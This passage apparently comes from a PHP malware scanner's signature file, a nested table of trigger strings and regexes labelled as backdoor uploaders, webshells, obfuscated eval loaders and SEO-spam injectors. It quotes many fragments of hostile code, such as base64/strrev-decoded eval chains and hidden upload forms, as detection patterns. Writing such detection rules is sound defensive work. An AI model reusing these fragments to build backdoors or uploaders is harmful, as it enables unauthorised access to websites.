		'=strrev("esab")."64_".strrev("edoced");$_X=$_A(\'ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgkX1MpKSk7\');$trd=strrev("taerc")."e_f".strrev("noitcnu")' => array(STR_CLEARFILE, 'php.backdoor.generic-webshell.007', NULL),
		'$__raw_val = ($__funct_gz($__funct_b(' => array(STR_CLEARFILE, 'php.backdoor.filesman.104', NULL),
	),

	'<strlen($' => array(STR_TRIGGER,

		'= chr(ord($' => array(STR_TRIGGER,
				
			'if(!function_exists' => array(STR_TRIGGER,
				'if\(!function_exists\([^\{]+\{[\s]*function[^\}]+<strlen\(\$[\w]+\[\$[\w]+\]\);\$[\w]+\+\+\) \$[\w]+\[\$[\w]+\]\[\$[\w]+\] = chr\(ord\(\$' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.100', 'function[^}]+chr\(ord\(\$[^}]+\}[\s]*return[\s]*\$[\w]+[^}]+}[\s]*\$[\w]+[\s]*=[\s]*"[^;]{20}[^}]+\}'),
			),

			'<strlen\(\$[\w]+\[\$[\w]+\]\);\$[\w]+\+\+\) \$[\w]+\[\$[\w]+\]\[\$[\w]+\] = chr\(ord\(\$' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.100.02', 'function [^}]+chr\(ord\(\$[^}]+\}[\s]*return[\s]*\$[\w]+[^}]+}[\s]*\$[\w]+[\s]*=[\s]*"[^;]{20}[^}]+'),
		),

		'");__halt_compiler();' => array(STR_TRIGGER,
			'=range("\0","\xff");' => array(STR_TRIGGER,
				'(__FILE__,false,null,__COMPILER_HALT_OFFSET__' => array(STR_CLEARFILE, 'php.malware.obfuscated.023', NULL),
			),
		),

		'JI82mxLbQ8TRuaK2maHX4ro1MzKt/EikVjyKIi4IymGkrKn' => array(STR_CLEARFILE, 'php.hacktool.generic.019', NULL),
	),

	'stri' => array(STR_TRIGGER,
		'if (stristr($host_referer, \'content-is-there.\'))' => array(STR_CLEARFILE, 'php.spam-seo.injector.045.02', NULL),
		'stristr($zhizhu_js,\'google' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.069', '\\$zhizhu_js=._SERVER."HTTP_USER_AGENT".;[\\s]*if..stristr..zhizhu_js,.google[^}]+}[^}]+}[\\s]*}'),
		'i\', $uniq_ref) > 0)||(stristr($uniq_ref,"google")))  {header' => array(STR_CLEARFILE, 'php.spam-seo.redirect.011', NULL),
		'string[] spider_flag_arr = spider_flag.Split(\'|\');' => array(STR_CLEARFILE, 'asp.spam-seo.injector.014', NULL),
	),
),

'move_uploaded_file' => array(STR_TRIGGER,

	'$_FILES[' => array(STR_TRIGGER,

		'echo' => array(STR_TRIGGER,

			'multipart/form-data' => array(STR_TRIGGER,

				'<form' => array(STR_TRIGGER,

					'if (isset($_FILES[' => array(STR_TRIGGER,

						'$maxfile' => array(STR_TRIGGER,
							'@move_uploaded_file($' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.058', NULL),
						),
						
						'$_FILES[\'azzatssins\']' => array(STR_CLEARFILE, 'php.backdoor.uploader.410', NULL),
					),

					'if(is_uploaded_file($_FILES[' => array(STR_TRIGGER,
						'move_uploaded_file($' => array(STR_TRIGGER,
							'<form method=post' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.056', NULL),
							'if($_FILES["filename"]["size"] > 1024*6*1024)' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.066', NULL),
						),
					),

					'<input type="file" name="image" />' => array(STR_TRIGGER,
						'strtolower(end(explode(".",$_FILES["image"]["name"])));' => array(STR_TRIGGER,
							'<form action="" method="POST" enctype="multipart/form-data">' => array(STR_CLEARFILE, 'php.backdoor.uploader.386', NULL),
						),
					),
	
					'if(@$_GET[' => array(STR_TRIGGER,
						');if($move) {echo' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.059', NULL),
					),

					'md5($_REQUEST[' => array(STR_TRIGGER,
						'<form' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.054', NULL),
					),

					'$filename = $_SERVER[SCRIPT_FILENAME];' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.057', NULL),
					';@move_uploaded_file($azx, $name); echo $name;}else{ echo' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.061', NULL),
				),

				'if(isset($_POST[' => array(STR_TRIGGER,

					'display:none' => array(STR_TRIGGER,
						'<form method="get">' => array(STR_CLEARFILE, 'php.backdoor.uploader.407', NULL),
					),

					'])){ if(move_uploaded_file($_FILES[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader_POST.046', '<form[\s]*[\w]+[\s]*=[\s]*[^<]+<input[\s]*[\w]+[\s]*=[\s]*[^<]+<input[\s]*[\w]+[\s]*=[\s]*[^\{]+if[\s]*\(isset\([\s]*\$_POST\[.[\w]+.\][\s]*\)[\s]*\)[\s]*\{[\s]*if[\s]*\([\s]*move_uploaded_file[\s]*\([\s]*\$_FILES\[.[\w]+.\][\s]*\[.[\w]+.\][\s]*,[\s]*\$_FILES\[.[\w]+.][^\}]+echo[\s]*.[\w]+.;[\s]*\}'),
					'</body></html>";if(isset($_POST[\'uploaded\']))' => array(STR_CLEARFILE, 'php.backdoor.uploader.380', NULL),
				),

				'function isCopy(cp){' => array(STR_CLEARFILE, 'php.backdoor.webshell.216', NULL),
			),

			'echo "Upload: " . $_FILES["file"]["name"]' => array(STR_TRIGGER,
				'Devs Hidden Uploader' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.183', '<\?\w*\s*if\s*\(\s*isset\s*\(\s*\$_\w+\[.devs[^;]+?;\s*echo\ "<h2>Devs\ Hidden\ Uploader<\/h2>";[^;]+?;[^:]+?:[^:]+?:[^;]+?;\s*echo\s*.(?:Size|Upload|Stored|Temp)[^\}]+?\}[^,]+?,[^;]+?;\s*echo\s*.Stored[^;]+?;\s*(?:echo[^;]+?;\s*)\}\s*\}\s*\?>'),
				'<\?\w*\s*(?:\$temp[^;]+?;\s*\$extension[^;]+?;\s*)?if\s*\(\s*\$_FILES[^\)]+?\)\s*\{\s*echo\s*.(?:Error|Return Code):[^;]+?;\s*\}\s*else\s*\{\s*echo\s*"Upload:[^;]+?;\s*echo\s*.Type:[^;]+?;\s*echo\s*.Size:[^;]+?;\s*echo\s*.Temp[^;]+?;\s*(?:if\s*\(\s*file_exists[^\)]+?\)\s*\)\s*\{\s*echo[^\{]+?\{\s*)?move_uploaded_file[^;]+?;\s*(?:echo\s*.(?:<br>)?Stored in:[^;]+?;\s*)?(?:\}\s*)?\}\s*\?>(?:\s*<html>\s*<body>\s*<form[^>]+?>\s*<label[^>]+?>Filename:\s*<\/label>[^\/]+?\/form>\s*<\/body>\s*<\/html>)?' => array(REX_CLEAR_MULTIMATCH, 'rex.backdoor.uploader.182', '<\?\w*\s*(?:\$temp[^;]+?;\s*\$extension[^;]+?;\s*)?if\s*\(\s*\$_FILES[^\)]+?\)\s*\{\s*echo\s*.(?:Error|Return Code):[^;]+?;\s*\}\s*else\s*\{\s*echo\s*"Upload:[^;]+?;\s*echo\s*.Type:[^;]+?;\s*echo\s*.Size:[^;]+?;\s*echo\s*.Temp[^;]+?;\s*(?:if\s*\(\s*file_exists[^\)]+?\)\s*\)\s*\{\s*echo[^\{]+?\{\s*)?move_uploaded_file[^;]+?;\s*(?:echo\s*.(?:<br>)?Stored in:[^;]+?;\s*)?(?:\}\s*)?\}\s*\?>(?:\s*<html>\s*<body>\s*<form[^>]+?>\s*<label[^>]+?>Filename:\s*<\/label>[^\/]+?\/form>\s*<\/body>\s*<\/html>)?'),
				'<\?\w*\s*if\s*\(\s*!empty\s*\(\s*\$_\w+\s*\)\s*&&\s*\$_\w+\[["\']\w+["\']\]\s*==[^\)]+?\)\s*:\s*\?>' => array(REX_CLEAR_MULTIMATCH, 'rex.backdoor.uploader.186', '<\?\w*\s*if\s*\(\s*!empty\s*\(\s*\$_\w+\s*\)\s*&&\s*\$_\w+\[["\']\w+["\']\]\s*==[^\)]+?\)\s*:\s*\?>[^;]+?;[^:]+?:[^:]+?:[^;]+?;\s*(?:echo\s*.(?:Type|Size|Stored|Temp)[^;]+?;\s*){1,5}\s*\}\s*\}\s*\?>'),
			),

			
			'move_uploaded_file($_FILES[\'userfile\'][\'tmp_name' => array(STR_TRIGGER,
				'$uploaddir = "";' => array(STR_CLEARFILE, 'php.backdoor.uploader.148', NULL),
				'GIF[\d]+[^\n]+[\s]*<\?php' => array(REX_CLEARFILE, 'rex.backdoor.uploader.148', NULL),
				'echo "<form method=\'post\' action=\'\' enctype=\'multipart/form-data\'><select name=' => array(STR_CLEARFILE, 'php.backdoor.uploader.256', NULL),
			),

			'echo "<body bgcolor=' => array(STR_TRIGGER,
				'echo " Tools";' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.185', 'date_default[^;]+?;\s*if\s*\(\s*isset\s*\(\s*\$_\w+\[.\w+[^\)]+?\)\s*\)\s*\{\s*echo "<body bgcolor=[^;]+?;\s*echo[^:]+?:[^:]+?:[^;]+?;\s*echo\s*.<hr>.\s*;\s*\}\s*\}\s*function\s+rand_ua[^\|]+\|\s*<font\s*color[^\|]+?\|\s*<font\s*color[^>]+?>Checked on[^\}]+?\}\s*\}\s*else\s*\{\s*echo " Tools";\s*\}'),
				'echo "Upload: "' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.184', 'if[\s]*\([\s]*isset[\s]*\([\s]*\$_GET\[.[\w]+.\][\s]*\)[\s]*\)[\s]*\{[\s]*echo[\s]*.<body bgcolor[^{]+[\s]*echo[^;]+;[\s]*echo .<form action[^\?]+}[\s]*\}'),
			),

			'echo\s*[\'"]\s*<form\s*method=[\'"]POST[\'"]\s*enctype=[\'"]multipart\/form-data[\'"]' => array(REX_TRIGGER,
				'echo \'<font color="green">\'.$_FILES[\'file\'][\'name\']' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.128', 'if\(isset\(\$_GET\[.[\w]+.\]\)\)\{[\s]*echo .<form method=.POST[^;]+;[\s]*if.isset.._POST[^;]+move_uploaded_file.._FILES[^;]+font>.;[\s]*\}[\s]*else[\s]*\{[\s]*echo[\s]*.<font color="green[^;]+;[\s]*\}[\s]*\}[\s]*exit;[\s]*\}'),
				'= $_GET[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.260', '\$(\w+)\s*=\s*\$_GET\[.\w+.\]\s*;\s*if\(\$\1\s*=+\s*.\w+.\s*\)\s*{\s*(\$\w+)\s*=\s*\$_FILES\[.\w+.\]\s*\[.\w+.\]\s*;\s*(\$\w+)\s*=\s*\$_FILES\[.\w+.\]\s*\[.\w+.\]\s*;\s*echo\s*[\'"]<form\s*method=[\'"]POST[\'"]\s*enctype[^;]+;\s*move_uploaded_file\((?:\2|\3)\s*,\s*(?:\2|\3)\)\s*;\s*}'),
			),

			'$uploadOk' => array(STR_TRIGGER,
				'$target_dir' => array(STR_TRIGGER,
					'<form action=' => array(STR_TRIGGER,
						'if(move_uploaded_file(' => array(STR_TRIGGER,
							'pathinfo($target_file,PATHINFO_EXTENSION);' => array(STR_CLEARFILE, 'php.backdoor.uploader.270', NULL),
						),
					),
				),
			),

			'){?><form enctype=' => array(STR_TRIGGER,
				'<?php if($_GET["' => array(STR_TRIGGER,
					'){if (!move_uploaded_file($' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.126', '<\?php\s*if\(\$_GET\[.(\w+).\]==(\d+)\)\{\?>[^>]+>Select[^>]+>[^>]+><br[^<]+<input[^<]+<input\stype=.hidden.\s*name=.\1.\s*value=.\2.[^{]+\{if\s*\(\!move_uploaded_file[^\{]+\{\}\}\}\?>'),
				),
			),

			'>";move_uploaded_file(${${' => array(STR_TRIGGER,
				'"]});if(${${"' => array(STR_TRIGGER,
					'>\n";@ob_start();error_reporting(E_ERROR|E_WARNING|E_PARSE|E_NOTICE);@ini_set(' => array(STR_CLEARFILE, 'php.backdoor.uploader.340', NULL),
				),
			),

			'"hello"' => array(STR_TRIGGER,
				'echo "testtrue";' => array(STR_TRIGGER,
					'$_GET["test"]' => array(STR_CLEARFILE, 'php.backdoor.uploader.208', NULL),
				),
			),

			'>Path To Upload<' => array(STR_TRIGGER,
				'!empty($_POST[\'path\'])) ? $_POST[\'path\'] : getcwd();' => array(STR_CLEARFILE, 'php.backdoor.uploader.141', NULL),
			),

			'}echo \'<html><head><title>Upload files' => array(STR_TRIGGER, 
				'if (move_uploaded_file($files[\'tmp_name\'], $fullpath)) {' => array(STR_CLEARFILE, 'php.backdoor.uploader.124', NULL),
			),

			'echo "<h1>Not Found</h1>' => array(STR_TRIGGER,
				'echo "<a href=\"http://".$_SERVER["HTTP_HOST"].str_ireplace($ss, $_FILES["filename"]["name"], $_SERVER' => array(STR_CLEARFILE, 'php.backdoor.uploader.087', NULL), 
			),

			'if ($mode==\'upload\') {' => array(STR_TRIGGER,
				'echo $_FILES["filename"]["name"];' => array(STR_CLEARFILE, 'php.backdoor.uploader.077', NULL),
			),

			'echo \'<a href=\'.$file.' => array(STR_TRIGGER,
				'echo("FILE' => array(STR_CLEARFILE, 'php.backdoor.uploader.109', NULL),
			),

			'style="border-collapse: collapse; display:none;"' => array(STR_TRIGGER,
				'onclick="if(confirm(\\\'download?\\\')){window.open(' => array(STR_CLEARFILE, 'php.hacktool.downloader.004', NULL),
			),

			'move_uploaded_file($_FILES["file"]["tmp_name"], "Images/" . $_FILES["file"]["name"]);' => array(STR_TRIGGER,
				'$newfile = uniqid("image_").".".$extension;' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.175', '\$temp\s*=\s*explode[^;]+?;\s*\$extension[^;]+?;\s*if\s*\(\s*\$_FILES[^;]+?;\s*\}\s*else\s*\{\s*\$newfile\ =\ uniqid\("image_"\)\."\."\.\$extension;\s*move_uploaded_file[^,]+?,\s*["\']Images[^;]+?;\s*\}'),
			),

			'echo \'#Fail\';' => array(STR_TRIGGER,
				'if(move_uploaded_file($_FILES["file"]["tmp_name"], "../assets/carousel/".$_POST["filename"]))' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.178', 'if\s*\(\s*isset\s*\(\s*\$_FILES\s*\[.file.\]\s*\)\s*\)\s*\{\s*if\s*\(\s*file_exists[^;]+?;\s*\}\s*if\(move_uploaded_file\(\$_FILES\["file"\]\["tmp_name"\],\ "\.\.\/assets\/carousel\/"\.\$_POST\["filename"\]\)\)\s*\{\s*echo[^;]+?;\s*\}\s*else\s*\{\s*echo \'#Fail\';\s*\}\s*\}'),
			),

			'Upload Files:' => array(STR_TRIGGER,
				'echo "<script>alert(\'uploaded :D\')</script>";' => array(STR_CLEARFILE, 'php.backdoor.uploader.179', NULL),
			),

			'get_magic_quotes_gpc' => array(STR_TRIGGER,
				'md5($_POST[\'pwd\'])' => array(STR_CLEARFILE, 'php.backdoor.uploader.190', NULL),
			),

			'if($system == \'pro\'){' => array(STR_CLEARFILE, 'php.backdoor.uploader.227', NULL),
			'] Anon Aplha File Uploader [' => array(STR_CLEARFILE, 'php.backdoor.uploader.226', NULL),
			'echo "<h2>Successfully Uploaded Images' => array(STR_CLEARFILE, 'php.backdoor.uploader.223', NULL),
			'{echo \'ok\';}' => array(STR_CLEARFILE, 'php.backdoor.uploader.209', NULL),
			'echo "feature_images/".$t.$name;' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.173', '\$name\s*=\s*strtolower[^;]+?;\s*\$\w[^;]+?;\s*if\s*\(\s*move_uploaded[^,]+?,\s*.feature_images[^\{]+?\{\s*echo\ "feature_images\/"\.\$t\.\$name;\s*\}'),
			'echo "Rand(100-100): " . "" . $_FILES["file"]["name"];' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.180', 'if\s*\(\s*isset\s*\(\s*\$_\w+\[\s*(?:\$browser|["\']index)[^;]+?;[^;]+?;\s*\{\s*move_uploaded_file[^;]+?;\s*echo\ "Rand\(100\-100\):\ "\ \.\ ""\ \.\ \$_FILES\["file"\]\["name"\];\s*echo[^;]+?;\s*\}\s*\}'),
			'$result=unlink("upf.php");' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.187', 'if\s*\(\s*@?\s*\$_\w+[^\)]+?\)\s*\{\s*\$result=unlink\("upf\.php"\);\s*if\s*\(\s*\$\w+\s*\)\s*\{\s*echo[^;]+?;\s*\}\s*\}(?:[^\']+\'){1,20} upok\';\s*\}\s*else\s*\{\s*echo[^;]+?;\s*\}\s*\}\s*else\s*\{\s*echo[^;]+?;\s*\}\s*\}'),
			'if(!Check25Port())' => array(STR_CLEARFILE, 'php.backdoor.uploader.189', NULL),
			'if ($_POST[\'pass\'] == $pass) {$_SESSION[\'pass\'] = $pass;' => array(STR_CLEARFILE, 'php.backdoor.uploader.192', NULL),
			'){echo "special"; move_uploaded_file($_FILES[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.194', 'if\s*\(\s*isset\s*\(\s*\$_\w+\[.special.\]\s*\)\s*\)\s*\{\s*echo "special"; move_uploaded_file\(\$_FILES\[[^;]+?;\s*\}'),
			'if(isset($_POST[\'pw\'])&&$_POST[\'pw\']==' => array(STR_CLEARFILE, 'php.backdoor.uploader.193', NULL),
			'["pass"]) && ($_' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.191', 'if\s*\(\s*isset\s*\(\s*\$_\w+\["pass"\]\) && \(\$_\w+\["pass"\]\s*==\s*[^\)]+?\)\s*\)\s*\{if\ \(!isset\(\$_FILES[^,]+?,\s*[^;]+?;\s*die\s*\(\s*\)\s*;\s*\}\s*'),
			'move_uploaded_file($_FILES[base64_decode(' => array(STR_CLEARFILE, 'php.phishing.paypal.013.05', NULL),
			'echo "<a href=\"$file\">$file</a>";' => array(STR_CLEARFILE, 'php.backdoor.uploader.064', NULL),
			'<title>Upload Zip file' => array(STR_CLEARFILE, 'php.backdoor.zip_uploader.002', NULL),
			'$current . "&mode=upload\' method = \'POST\' ENCTYPE=\'multipart/form-data\'>\n";' => array(STR_CLEARFILE, 'php.backdoor.uploader.107', NULL),
			'$nowaddress <input type=file name=elif ><input type=submit value=Upload' => array(STR_CLEARFILE, 'php.backdoor.uploader.138', NULL),
			'is_deleteable\' => $allow_delete && ((!is_dir($i) && is_writable($directory)) ||' => array(STR_CLEARFILE, 'php.backdoor.simple_file_manager.001', NULL),
			'value="xunknown hacktn' => array(STR_CLEARFILE, 'php.backdoor.uploader.151', NULL),
			';$path=str_replace("up.php",$_FILES["file"]["name"],$url);echo"Go here : ".$path."<br>";' => array(STR_CLEARFILE, 'php.backdoor.uploader.218', NULL),
			'echo "your shell location' => array(STR_CLEARFILE, 'php.hacktool.shell-uploader.006', NULL),
			'if(move_uploaded_file($_FILES[\'uf\'][\'tmp_name\'],$uf)) echo $uf;' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.222', '\$uf=basename\(\$_FILES\[.uf.\]\[.name.\]\);[\s]*if\(move_uploaded_file\(\$_FILES\[.uf.\]\[[^;]+echo \$uf;'),
			'<form action="<?php echo $_SERVER[\'PHP_SELF\'].\'?Nfiles=\'.$Nfiles; ?>" method="post' => array(STR_CLEARFILE, 'php.backdoor.uploader.234', NULL),
			'<head><title>Uploader v' => array(STR_CLEARFILE, 'php.backdoor.uploader.250', NULL),
			'); echo \'<nofollow><noindex><script src="\'.$' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.262', '\@ini_set\(.(?:display_errors|log_errors)[\'"],[^\$]+\$_POST\[[\'"](\w+)[\'"]\s*\]\s*\)\s*and\s*\@isset\(\$_FILES\[[^{]+{\s*\@[^\$]+\$\1\s*=\s*\$_POST\[[\'"]\1[\'"]\]\s*;[^\@]+\@move_uploaded_file\(\$[^;]+;\s*echo\s*[\'"]\s*<\!--[^}]+}\s*else\s*echo\s*[\'"]\s*<\!--[^\2]+echo\s*[\'"]\s*<nofollow>\s*<noindex>\s*<script\s*src=[^>]+>\s*<\/script>\s*<\/noindex>\s*<\/nofollow>\s*[\'"]\s*;\s*}'),
			'$_SERVER[SCRIPT_FILENAME]; touch/*;*/($filename, $time);} ?>\\\'); /*\');' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.255', 'file_put_contents\(.[\'"][^<]+<\?php\s*if\s*\(isset\(\$_GET\[..(\w+)..\]\)\)\s*if\s*\(..\w+..\s*==\s*md5\(\$_GET\[..\1..\]\)\)\s*{\s*echo\s*[^<]+<form\s*method=..[\'"][Pp][Oo][Ss][Tt][^}]+}\s*else\s*{\s*echo\(..\w+..\)\s*;\s*}\s*(\$\w+)\s*=\s*\$_SERVER\[SCRIPT_FILENAME\]\s*;\s*touch[^\(]+\(\2,\s*\$\w+\)\s*;\s*}\s*\?>\s*.[\'"]\)\s*;\s*\/\*[\'"]\)\s*;'),
			'echo dirname(__FILE__);' => array(STR_CLEARFILE, 'php.backdoor.uploader.276', NULL),
			'</form><?php $uploaddir = getcwd ()."/";$uploadfile = $uploaddir' => array(STR_CLEARFILE, 'php.backdoor.uploader.284', NULL),
			'if\(isset\(\$_POST\[[^\]]+\\x[^\]]+\]\)\)\{if\(\$_FILES\[[^\)]+\)\{echo[\s]*"[^"]+"\.\$_FILES' => array(REX_CLEARFILE, 'php.backdoor.uploader_POST.024', NULL),
			'fwrite(fopen($fname,\'w\'),$fcode); } }if(isset($_GET[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader_POST.032', 'if\(isset\(\$_GET\[[^\{]+\{[\s]*if\(!isset\(\$_POST\[[^<]+<form[\s]*method=.POST.>[^\{]+else[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*\$_POST\[.[\w]+.\];[\s]*\$[\w]+[\s]*=[\s]*\$_POST\[[^@]+@\$_FILES\[[^<]+<a[\s]*href[^;]+;[\s]*\}[\s]*\}[\s]*echo[\s]*.<form[\s]*method=POST[^;]+<\/form>.;[\s]*\}'),
			'$target.basename( $_FILES[\'uploaded\'][\'name\'])' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader_POST.036', 'if[\s]*\((md5\()?@\$_GET\[.[\w]+.\](\))?[\s]*==[\s]*.[\w]+.\)[\s]*\{[\s]*print[^;]+form>[\s]*.;[\s]*\$[\w]+[^\(]+basename\([\s]*\$_FILES\[.[\w]+.\]\[.[\w]+.\]\)[\s]*;[^\{]+\$[\w]+\)\)[\s]*\{[\s]*echo[\s]*.[\w]+.;[\s]*\}[\s]*\}'),
			'<a href=\'$url\'>Open Shell' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.039', NULL),
			'<input type="submit" class="d7net_table' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.040', NULL),
			'if (md5(base64_decode($_REQUEST[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader_POST.041', 'if\([\s]*isset\([\s]*\$_REQUEST\[.[\w]+.\][\s]*\)[\s]*\)[\s]*\{[\s]*@error_reporting\([\d]+\);[\s]*function[\s]*[\w]+\(\)[\s]*\{[\s]*define[^\!]+md5\(base64_decode\(\$_REQUEST\[.[\w]+.\]\)\)[\s]*!==[\s]*.[\w]+.\)[\s]*exit\([^\}]+\}.[\s]*\);[\s]*touch\([\s]*\$[\w]+,[\s]*\$[\w]+[\s]*\);[\s]*if\([\s]*\$[\w]+[\s]*\)[\s]*echo[^\}]+\}\).\);[\s]*else[\s]*echo[^;]+\}\).\);[\s]*exit;[\s]*\}[\s]*echo[\s]*.<form[\s]*method[^\}]+form>.;[\s]*exit;[\s]*\}[\s]*[\w]+\(\);[\s]*}'),
			'$path . basename( $_FILES[\'uploaded_file\'][\'name\']);' => array(STR_CLEARFILE, 'php.backdoor.uploader_POST.042', NULL),
		),

		'$_FILES[\'F1l3\'' => array(STR_TRIGGER,
			'echo \'You are forbidden!' => array(STR_CLEARFILE, 'php.backdoor.uploader.041', NULL),
			'$_FILES[\'F1l3\'' => array(STR_CLEAR_MULTIMATCH,'php.backdoor.uploader.020', 'if\s*\(\$_FILES\[.F1l3.\]\)\s*\{\s*move_uploaded_file.\$_[^\)]+?\]\);[^\}]+Exit;\}(;)?(\s*if\s*\(\$_FILES\[.F1l3.\]\)\s*\{[^\?>]+?\}\s*else[^\?>]+?\})?'),
		),

		'multipart/form-data' => array(STR_TRIGGER,
			'dirname(__FILE__).DIRECTORY_SEPARATOR.$_FILES[' => array(STR_CLEARFILE, 'php.backdoor.uploader.394', NULL),
		),

		'("<br>Done!<br>");' => array(STR_CLEARFILE, 'php.backdoor.uploader.101', NULL),
		'EncodeExplorer::getConfig' => array(STR_CLEARFILE, 'php.backdoor.encode_explorer.001', NULL),
		'echo "The file ".  basename( $_FILES[\'uploaded_file\'][\'name\']).' => array(STR_CLEARFILE, 'php.backdoor.uploader.212', NULL),
		'"phuploader" style="margin: 0px; padding: 0px"' => array(STR_CLEARFILE, 'php.backdoor.phuploader.001', NULL),
		'<?php move_uploaded_file($_FILES["file"]["tmp_name"], $_POST["filename"]);' => array(STR_CLEARFILE, 'php.backdoor.uploader.355', NULL),
	),

	'@move_uploaded_file' => array(STR_TRIGGER,

		'][\'tmp_name\'],$_FILES[' => array(STR_TRIGGER,

			'][\'name\']);?>' => array(STR_TRIGGER,
				'<?php @move_uploaded_file($_FILES[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.159', '<\?php[\s]*@move_uploaded_file\(\$_FILES\[....\]\[.tmp_name.\],\$_FILES\[....\]\[.name.\]\);[\s]*\?>'),
			),

			']);};if($_POST[\'l\']){file_put_contents(\'editor.php' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.160', 'if\(@?\$_GET\[[^\]]+\]\)\{@move_uploaded_file\(\$_FILES\[...\]\[.tmp_name.\],\$_FILES\[...\]\[.name.\]\);\};if\(\$_POST\[...\]\)\{file_put_contents\(.editor\.php[^>]+><[^;]+form>.;'),
		),

		'if(isset($_FILES[\'uf\'][\'name\'])){$uf=@basename($_FILES[\'uf\'][\'name\']);' => array(STR_CHAIN_TRIGGER,
			'@basename($_FILES[\'uf\'][\'name\']);' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.363', 'if\(isset\(\$_FILES\[.uf.\]\[.name.\][^;]+\);'),
			'if(@move_uploaded_file($_FILES[\'uf' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.uploader.363.02', 'if\(@move_uploaded_file\(\$_FILES\[.uf.\][^\}]+echo \$uf;\}'),
		),

		'sleep(1);' => array(STR_TRIGGER,
			'type="text/javascript">window.top.window.stopUpload(<?php echo $result;' => array(STR_TRIGGER,
				'if(@move_uploaded_file($_FILES[\'myfile\'][\'tmp_name\'], $target_path)) {' => array(STR_CLEARFILE, 'php.backdoor.uploader.164', NULL),
			),
		),

		'header("Refresh: 0; url=http://".$mainip."/go.php' => array(STR_TRIGGER,
			'$xml_link = \'http://\'.$domain.\'/\'.$filename.\'?sitemap=v&id=\'.$id;' => array(STR_CLEARFILE, 'php.backdoor.uploader.161', NULL),
		),

		'(!empty($_GET[\'symlinktarget\']) && empty($_GET[\'symlink\']))' => array(STR_TRIGGER,
			'tree_plus($_SESSION[\'tree\'], $_SESSION[\'hassubdirs\'], $treeroot);' => array(STR_CLEARFILE, 'php.backdoor.filesman.072', NULL),
		),

		'else die(\'<h1>Not Found</h1>' => array(STR_TRIGGER,
			'$target_path = $this->uploadLocation.basename($_FILES[' => array(STR_CLEARFILE, 'php.backdoor.uploader.165', NULL),
		),

		'if( $_POST[\'_upl\'] == "Upload" )' => array(STR_TRIGGER,
			'$_FILES[\'file\'][\'name\'])) { echo \'<b>Ups !!!' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.167', 'if\( \$_POST\[._upl.\] == "Upload" \) \{[\s]*if\(@move_uploaded_file\(\$_FILES[^{]+\{ echo .<b>Ups !!![^}]+\}[\s]*else[\s]*\{[^}]+\}[\s]*\}'),
		),

		'file_put_contents(' => array(STR_TRIGGER,
			'if\(\$_GET\[.\\\\x...\]\)[\s]*\{[\s]*@move_uploaded_file\(\$_FILES\[.\\\\x...\]' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.uploader.269', 'if\(\$_GET\[.\\\\x...\]\)[\s]*\{[\s]*@move_uploaded_file\(\$_FILES\[.\\\\x...\][^}]+\}[\s]*if\(\$_POST\[...\]\)[\s]*\{[\s]*file_put_contents\([^}]+\}[\s]*if[\s]*\(\$_GET\[[^\]]+\]\)[\s]*echo[\s]*[^;]+;'),
		),

		'explode(\'-\'' => array(STR_TRIGGER,
			'if(md5($_POST[\'password\']) !=' => array(STR_CLEARFILE, 'php.backdoor.uploader.283', NULL),
		),

		'echo $name;' => array(STR_TRIGGER,
			'echo "file not found";' => array(STR_CLEARFILE, 'php.backdoor.uploader.369', NULL),
		),

		'@move_uploaded_file($tmp_name, $security' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.039', NULL),
		'@move_uploaded_file($userfile_tmp, $abod);' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.021', 'if\(isset\(\$_[^\)]+\]\)\)[\s]*\{[\s]*(if\(isset\(\$_[^\)]+\]\)\)[\s]*\{[\s]*)?(echo[\s]*"[^;]+";[\s]*if\(isset\(\$_[^\)]+\]\)\)[\s]*\{[\s]*)?\$filedir[^;]+;[^\}]+\}[\s]*\}[\s]*(else[\s]*\{[\s]*echo[^\}]+[\s\}]+)?'),
		'@move_uploaded_file(#userfile_tmp, #abod);' => array(STR_CLEARFILE, 'php.spam-seo.stylesshets_com.001', NULL),
